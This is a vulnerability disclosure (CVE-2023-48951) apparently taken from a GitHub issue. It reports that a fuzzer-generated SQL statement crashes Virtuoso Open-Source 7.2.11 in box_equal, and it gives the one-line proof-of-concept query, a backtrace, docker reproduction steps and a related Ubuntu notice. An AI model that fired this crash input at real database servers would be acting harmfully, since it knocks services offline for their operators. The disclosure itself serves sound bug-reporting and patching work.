Headline
CVE-2023-48951: Fuzzer: Virtuoso 7.2.11 crashed at box_equal · Issue #1177 · openlink/virtuoso-opensource
An issue in the box_equal function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE v0 ( v1 SMALLINT CHECK ( CONTAINS ( ‘del’ , ‘reabbreviating’ , ‘diamonds’ ) ) ) ;
backtrace:
#0 0xdeab6a (box_equal+0xba) #1 0x773df3 (sqlo_cname_ot+0x53) #2 0x6e0161 (sqlo_df+0x461) #3 0x6e0d6c (sqlo_df+0x106c) #4 0x6e067f (sqlo_df+0x97f) #5 0x70ea77 (sqlo_top_2+0x267) #6 0x70e4a5 (sqlo_top_1+0x135) #7 0x70ffa6 (sqlo_top_select+0x156) #8 0x6b9b6f (sql_stmt_comp+0x8bf) #9 0x6bc9d2 (sql_compile_1+0x1a62) #10 0x4e213f (ddl_table_check_constraints_define_triggers+0x1af) #11 0x4e462d (ddl_table_constraints+0xd0d) #12 0x4e5331 (sql_ddl_node_input_1+0xbc1) #13 0x4e57ee (sql_ddl_node_input+0x10e) #14 0x7bcb0b (ddl_node_input_1+0x19b) #15 0x7bd1e7 (qn_without_ac_at+0xc7) #16 0x7af05e (qn_input+0x3ce) #17 0x7c1be9 (qr_dml_array_exec+0x839) #18 0x7ce602 (sf_sql_execute+0x15d2) #19 0x7cecde (sf_sql_execute_w+0x17e) #20 0x7d799d (sf_sql_execute_wrapper+0x3d) #21 0xe214bc (future_wrapper+0x3fc) #22 0xe28dbe (_thread_boot+0x11e) #23 0x7f4182517609 (start_thread+0xd9) #24 0x7f41822e7133 (clone+0x43)
ways to reproduce (write poc to the file /tmp/test.sql first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba
Related news
Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.